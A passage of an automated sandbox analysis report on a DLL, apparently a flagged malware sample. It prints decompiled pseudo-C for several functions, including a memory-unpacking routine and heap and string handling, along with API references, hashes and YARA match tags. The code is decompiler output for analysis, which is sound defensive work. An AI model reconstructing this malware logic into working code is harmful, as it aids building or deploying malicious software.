					_t31 = E00EC1B2F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0xecd270 =  *0xecd270 ^ 0x81bbe65d;
						_t32 = E00EC2049(0x60);
						__eflags = _t32;
						 *0xecd32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xecd32c; // 0x30095b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xecd32c; // 0x30095b0
							 *_t51 = 0xece836;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xecd238, 0, 0x43);
							__eflags = _t36;
							 *0xecd2c4 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xecd25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xecd27c; // 0x213a5a8
								_t13 = _t58 + 0xece55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xecc2a7);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00EC269C( ~_v8 &  *0xecd270, 0xecd00c); // executed
								_t42 = E00EC4094(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E00EC96A4(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00EC6786(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E00EC3DD9(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xecd160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E00ECA501(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                                  0x00ec225b
                                                  0x00ec2266
                                                  0x00ec2269
                                                  0x00ec226c
                                                  0x00ec226f
                                                  0x00ec2276
                                                  0x00ec2278
                                                  0x00ec2284
                                                  0x00ec2286
                                                  0x00ec2286
                                                  0x00ec228f
                                                  0x00ec2297
                                                  0x00ec229a
                                                  0x00ec22b4
                                                  0x00ec22c0
                                                  0x00ec22c2
                                                  0x00ec22c7
                                                  0x00ec22d1
                                                  0x00ec22d1
                                                  0x00ec22c9
                                                  0x00ec22c9
                                                  0x00ec22c9
                                                  0x00ec22c9
                                                  0x00ec22d8
                                                  0x00ec22e5
                                                  0x00ec22ec
                                                  0x00ec22f1
                                                  0x00ec22f1
                                                  0x00ec22f9
                                                  0x00ec22fc
                                                  0x00ec2322
                                                  0x00ec232e
                                                  0x00ec2333
                                                  0x00ec2335
                                                  0x00ec233a
                                                  0x00ec2366
                                                  0x00ec2368
                                                  0x00ec233c
                                                  0x00ec2340
                                                  0x00ec2345
                                                  0x00ec234a
                                                  0x00ec2351
                                                  0x00ec2357
                                                  0x00ec235c
                                                  0x00ec2362
                                                  0x00ec2369
                                                  0x00ec236b
                                                  0x00ec236d
                                                  0x00ec237c
                                                  0x00ec2382
                                                  0x00ec2384
                                                  0x00ec2389
                                                  0x00ec23b9
                                                  0x00ec23bb
                                                  0x00ec238b
                                                  0x00ec238b
                                                  0x00ec2391
                                                  0x00ec239e
                                                  0x00ec23a4
                                                  0x00ec23a4
                                                  0x00ec23ac
                                                  0x00ec23b5
                                                  0x00ec23bc
                                                  0x00ec23be
                                                  0x00ec23c0
                                                  0x00ec23c7
                                                  0x00ec23d4
                                                  0x00ec23d9
                                                  0x00ec23de
                                                  0x00ec23e0
                                                  0x00ec23e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec23e4
                                                  0x00ec23e9
                                                  0x00ec23eb
                                                  0x00ec23f2
                                                  0x00ec23f6
                                                  0x00ec23f9
                                                  0x00ec240e
                                                  0x00ec2412
                                                  0x00ec2417
                                                  0x00000000
                                                  0x00ec2417
                                                  0x00ec23fb
                                                  0x00ec23fd
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec2403
                                                  0x00ec2408
                                                  0x00ec240a
                                                  0x00ec240c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec240c
                                                  0x00ec23ef
                                                  0x00ec23ef
                                                  0x00ec23c0
                                                  0x00ec22fe
                                                  0x00ec22fe
                                                  0x00ec2303
                                                  0x00ec2419
                                                  0x00ec241d
                                                  0x00ec2425
                                                  0x00ec2425
                                                  0x00000000
                                                  0x00ec241d
                                                  0x00ec2309
                                                  0x00ec230c
                                                  0x00ec2316
                                                  0x00ec231d
                                                  0x00000000
                                                  0x00ec242d
                                                  0x00ec242d
                                                  0x00ec2431
                                                  0x00ec2435
                                                  0x00ec2435

                                                  APIs
                                                    • Part of subcall function 00EC550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,00EC2274,00000000,00000000), ref: 00EC551D
                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00EC22F1
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • memset.NTDLL ref: 00EC2340
                                                  • RtlInitializeCriticalSection.NTDLL(03009570), ref: 00EC2351
                                                    • Part of subcall function 00EC3DD9: memset.NTDLL ref: 00EC3DEE
                                                    • Part of subcall function 00EC3DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00EC3E22
                                                    • Part of subcall function 00EC3DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00EC3E2D
                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00EC237C
                                                  • wsprintfA.USER32 ref: 00EC23AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 4246211962-0
                                                  • Opcode ID: e32c2d0b12cb73942f60d44169228235e7b5b3c51b0676ec7bf1e95b8e353e2d
                                                  • Instruction ID: df2f11aecd1d1bf147f472e2ac9d28c374f532fe369b33d5ad1bcb62ffa1ead4
                                                  • Opcode Fuzzy Hash: e32c2d0b12cb73942f60d44169228235e7b5b3c51b0676ec7bf1e95b8e353e2d
                                                  • Instruction Fuzzy Hash: 2A51E171A00215AFCB28DBA5DE45FAE37E8BB08708F14543EF211F7261E677990B9B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC8504, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 56%
                                                  			E00EC8504(void* __ecx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t25;
				void* _t30;
				void* _t37;
				void* _t40;
				intOrPtr _t42;

				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0xecd340; // 0x3008d39
				_push(0x800);
				_push(0);
				_push( *0xecd238);
				if( *0xecd24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0xecd24c =  *0xecd24c + 1;
							L11:
							return _t30;
						}
						_t7 =  &_a4; // 0xec685f
						_t44 =  *_t7;
						_t40 = _v8;
						 *_a16 =  *_t7;
						 *_a20 = E00EC2496(_t44, _t40); // executed
						_t18 = E00ECA66E(_t37, _t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0xecd24c < 5) {
								 *0xecd24c =  *0xecd24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E00ECA1B0();
						RtlFreeHeap( *0xecd238, 0, _t40); // executed
						goto L10;
					}
					_t4 =  &_a4; // 0xec685f
					_t6 =  &_a4; // 0xec685f
					_t24 = E00ECA279( *_t6, _t32, _t37, _t42,  &_v8, _t4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				_t25 = RtlAllocateHeap(); // executed
				if(_t25 == 0) {
					goto L6;
				}
				_t1 =  &_a4; // 0xec685f
				_t3 =  &_a4; // 0xec685f
				_t24 = E00EC8B94( *_t3, _t32, _t37, _t42,  &_v8, _t1, _t25); // executed
				goto L5;
			}












                                                  0x00ec8504
                                                  0x00ec8507
                                                  0x00ec8508
                                                  0x00ec8512
                                                  0x00ec8519
                                                  0x00ec851e
                                                  0x00ec8520
                                                  0x00ec8526
                                                  0x00ec854e
                                                  0x00ec8566
                                                  0x00ec8568
                                                  0x00ec8569
                                                  0x00ec856b
                                                  0x00ec85a9
                                                  0x00ec85a9
                                                  0x00ec85af
                                                  0x00ec85b5
                                                  0x00ec85b5
                                                  0x00ec856d
                                                  0x00ec856d
                                                  0x00ec8573
                                                  0x00ec8576
                                                  0x00ec8585
                                                  0x00ec8587
                                                  0x00ec858e
                                                  0x00ec85c2
                                                  0x00ec85c7
                                                  0x00ec85c9
                                                  0x00ec85cb
                                                  0x00ec85cb
                                                  0x00000000
                                                  0x00ec85c9
                                                  0x00ec8590
                                                  0x00ec8595
                                                  0x00ec85a3
                                                  0x00000000
                                                  0x00ec85a3
                                                  0x00ec8551
                                                  0x00ec8559
                                                  0x00ec855d
                                                  0x00ec8562
                                                  0x00ec8562
                                                  0x00000000
                                                  0x00ec8562
                                                  0x00ec8528
                                                  0x00ec8530
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec8533
                                                  0x00ec853b
                                                  0x00ec853f
                                                  0x00000000

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00EC8528
                                                    • Part of subcall function 00EC8B94: GetTickCount.KERNEL32 ref: 00EC8BA8
                                                    • Part of subcall function 00EC8B94: wsprintfA.USER32 ref: 00EC8BF8
                                                    • Part of subcall function 00EC8B94: wsprintfA.USER32 ref: 00EC8C15
                                                    • Part of subcall function 00EC8B94: wsprintfA.USER32 ref: 00EC8C41
                                                    • Part of subcall function 00EC8B94: HeapFree.KERNEL32(00000000,?), ref: 00EC8C53
                                                    • Part of subcall function 00EC8B94: wsprintfA.USER32 ref: 00EC8C74
                                                    • Part of subcall function 00EC8B94: HeapFree.KERNEL32(00000000,?), ref: 00EC8C84
                                                    • Part of subcall function 00EC8B94: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00EC8CB2
                                                    • Part of subcall function 00EC8B94: GetTickCount.KERNEL32 ref: 00EC8CC3
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00EC8546
                                                  • RtlFreeHeap.NTDLL(00000000,00000002,_h,?,00EC685F,00000002,?,?,00EC2417,?), ref: 00EC85A3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                  • String ID: _h
                                                  • API String ID: 1676223858-4139817520
                                                  • Opcode ID: c7b41b0c3edf231d14bc05ac230426010320dcc3ea9d3fe75b14951275f011c1
                                                  • Instruction ID: 64b0f9248dc77adbfc5f100db70be0f282faa0d3f3ee52228d500b1b096b873f
                                                  • Opcode Fuzzy Hash: c7b41b0c3edf231d14bc05ac230426010320dcc3ea9d3fe75b14951275f011c1
                                                  • Instruction Fuzzy Hash: 23213E76200204EFDB159F55DF85FAA37ACEB48344F10503AF901B7260DBB3E9469BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC3AEF, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(80000002), ref: 00EC3B46
                                                  • SysAllocString.OLEAUT32(00EC1885), ref: 00EC3B89
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC3B9D
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC3BAB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: 3f8c1cdf541bf5712caedb0b87969cc78f479d329552fb912f1a3591b5637ac4
                                                  • Instruction ID: 92f7c2ac643513c229f31d0f491c2f1e10eeef6c9c3850b2f3b781d62057bab9
                                                  • Opcode Fuzzy Hash: 3f8c1cdf541bf5712caedb0b87969cc78f479d329552fb912f1a3591b5637ac4
                                                  • Instruction Fuzzy Hash: 1F31D871900109EFCB05DFA9D9C4DAE7BB5FF48344B21846EE50AA7210D7369E46CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004018F4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E004018F4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x404130;
				_t39 = E00401F5D(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x40414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x4051a7; // 0x4051a7
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E004018C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x40414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}























                                                  0x004018fb
                                                  0x0040190b
                                                  0x00401912
                                                  0x00401915
                                                  0x0040192a
                                                  0x00401931
                                                  0x00401936
                                                  0x00401947
                                                  0x0040194a
                                                  0x00401952
                                                  0x00401955
                                                  0x004019ff
                                                  0x0040195b
                                                  0x0040195b
                                                  0x0040195f
                                                  0x004019c7
                                                  0x00401961
                                                  0x00401961
                                                  0x00401964
                                                  0x00401966
                                                  0x0040196e
                                                  0x00401971
                                                  0x00401974
                                                  0x0040197c
                                                  0x00401984
                                                  0x00401985
                                                  0x00401986
                                                  0x0040198d
                                                  0x0040198d
                                                  0x004019a1
                                                  0x004019a6
                                                  0x004019af
                                                  0x004019b6
                                                  0x004019b9
                                                  0x004019bd
                                                  0x004019c2
                                                  0x00000000
                                                  0x00000000
                                                  0x00401979
                                                  0x00401979
                                                  0x004019c4
                                                  0x004019d1
                                                  0x004019e6
                                                  0x004019d3
                                                  0x004019dc
                                                  0x004019e1
                                                  0x004019f7
                                                  0x004019f7
                                                  0x00401a06
                                                  0x00401a0c

                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,0040167D,00003000,00000004,?,?,0040167D,00000000), ref: 0040194A
                                                  • memcpy.NTDLL(?,?,0040167D,?,?,0040167D,00000000), ref: 004019DC
                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,0040167D,00000000), ref: 004019F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Virtual$AllocFreememcpy
                                                  • String ID: Mar 9 2021
                                                  • API String ID: 4010158826-2159264323
                                                  • Opcode ID: ecb228c351fb0361c2fc9e029ed6e6128681d59fb3180a8fdea020d7e3bab62b
                                                  • Instruction ID: 0ad7c3425218c347bc4ddf429e648667056d2cd7a8494b6520e06ca5c12f1d10
                                                  • Opcode Fuzzy Hash: ecb228c351fb0361c2fc9e029ed6e6128681d59fb3180a8fdea020d7e3bab62b
                                                  • Instruction Fuzzy Hash: AF3163B1E011199FDF01CF99C881AAEBBB9FF48304F108139E505BB295D775AA45CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC1A70, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E00EC1A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00EC2049(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                  0x00ec1a7c
                                                  0x00ec1a80
                                                  0x00ec1a81
                                                  0x00ec1a82
                                                  0x00ec1a84
                                                  0x00ec1a86
                                                  0x00ec1a8b
                                                  0x00ec1a8e
                                                  0x00ec1b25
                                                  0x00ec1b2c
                                                  0x00ec1b2c
                                                  0x00ec1a97
                                                  0x00ec1a9e
                                                  0x00ec1aae
                                                  0x00ec1aae
                                                  0x00ec1ab4
                                                  0x00ec1ab6
                                                  0x00ec1abb
                                                  0x00ec1ac4
                                                  0x00ec1acc
                                                  0x00ec1acf
                                                  0x00ec1ada
                                                  0x00ec1ade
                                                  0x00ec1ae0
                                                  0x00ec1ae1
                                                  0x00ec1aea
                                                  0x00ec1aee
                                                  0x00ec1aff
                                                  0x00ec1af0
                                                  0x00ec1af5
                                                  0x00ec1afa
                                                  0x00ec1b09
                                                  0x00ec1b09
                                                  0x00ec1ade
                                                  0x00ec1b0f
                                                  0x00ec1b15
                                                  0x00ec1b15
                                                  0x00ec1b1e
                                                  0x00ec1b23
                                                  0x00ec1b23
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1198164300-0
                                                  • Opcode ID: 03db6a9eca220b5b6a5b4160bd0a05c21d7437e683678780e95d79900692b70d
                                                  • Instruction ID: b0464a799142fa2f087681884e0ea602bab78a0a2a257a8ace7281c98be77668
                                                  • Opcode Fuzzy Hash: 03db6a9eca220b5b6a5b4160bd0a05c21d7437e683678780e95d79900692b70d
                                                  • Instruction Fuzzy Hash: 1F212F75A01209EFCB10DFA4DA84E9EBBB5FF49315B1041ADE905E7211E7319E46CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC94A9, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E00EC94A9(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00EC2049(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xecc2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xecc2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                  0x00ec94b4
                                                  0x00ec94b8
                                                  0x00ec94ba
                                                  0x00ec94bb
                                                  0x00ec94c3
                                                  0x00ec94c3
                                                  0x00ec94c7
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec94be
                                                  0x00ec94bf
                                                  0x00ec94c2
                                                  0x00ec94c2
                                                  0x00ec94cf
                                                  0x00ec94d6
                                                  0x00ec94da
                                                  0x00ec94e2
                                                  0x00ec94e8
                                                  0x00ec94ea
                                                  0x00ec94ef
                                                  0x00ec94f3
                                                  0x00ec94f5
                                                  0x00ec94f8
                                                  0x00ec94ff
                                                  0x00ec94ff
                                                  0x00ec9509
                                                  0x00ec950c
                                                  0x00ec950f
                                                  0x00ec950f
                                                  0x00ec951b
                                                  0x00ec951b
                                                  0x00ec9528

                                                  APIs
                                                  • StrChrA.SHLWAPI(?,00000020,00000000,030095AC,?,00EC23DE,?,00EC7634,030095AC,?,00EC23DE), ref: 00EC94C3
                                                  • StrTrimA.KERNELBASE(?,00ECC2A4,00000002,?,00EC23DE,?,00EC7634,030095AC,?,00EC23DE), ref: 00EC94E2
                                                  • StrChrA.SHLWAPI(?,00000020,?,00EC23DE,?,00EC7634,030095AC,?,00EC23DE), ref: 00EC94ED
                                                  • StrTrimA.SHLWAPI(00000001,00ECC2A4,?,00EC23DE,?,00EC7634,030095AC,?,00EC23DE), ref: 00EC94FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Trim
                                                  • String ID:
                                                  • API String ID: 3043112668-0
                                                  • Opcode ID: 5d7d5aa4f51e8fb77214fcde4ce73fe825bb8af4f681f3571aefdb9902f0f108
                                                  • Instruction ID: bdaba0d1e356e5eb108bc9451cc7017f53db8bdddca5590f5e8d71455f41ca83
                                                  • Opcode Fuzzy Hash: 5d7d5aa4f51e8fb77214fcde4ce73fe825bb8af4f681f3571aefdb9902f0f108
                                                  • Instruction Fuzzy Hash: EA01F5716053155FC2318F6ACD4DF27BA98FB86754F11252CF855E7251DB63CC0382A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040111A, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E0040111A(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E0040163F(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                  0x00401123
                                                  0x00401128
                                                  0x00401136
                                                  0x0040113b
                                                  0x0040113b
                                                  0x00401141
                                                  0x00401146
                                                  0x0040114a
                                                  0x0040114e
                                                  0x0040114e
                                                  0x00401158
                                                  0x00401161

                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 0040111D
                                                  • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 00401128
                                                  • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 0040113B
                                                  • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 0040114E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Thread$Priority$AffinityCurrentMask
                                                  • String ID:
                                                  • API String ID: 1452675757-0
                                                  • Opcode ID: da6ec90e5bd888973ef2fd07813b313d2e66a90270c4e140ed5d1ad6d5d64011
                                                  • Instruction ID: 67fa18b92f8a63c61967de09933370e0a35cc4576ff87cf796d34e9f8e5d67a8
                                                  • Opcode Fuzzy Hash: da6ec90e5bd888973ef2fd07813b313d2e66a90270c4e140ed5d1ad6d5d64011
                                                  • Instruction Fuzzy Hash: 01E092712062106BE3117B295C85E6B6B5CDF95331B014236F620F62F0CB798D0286AD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC73FD, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00EC73FD(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
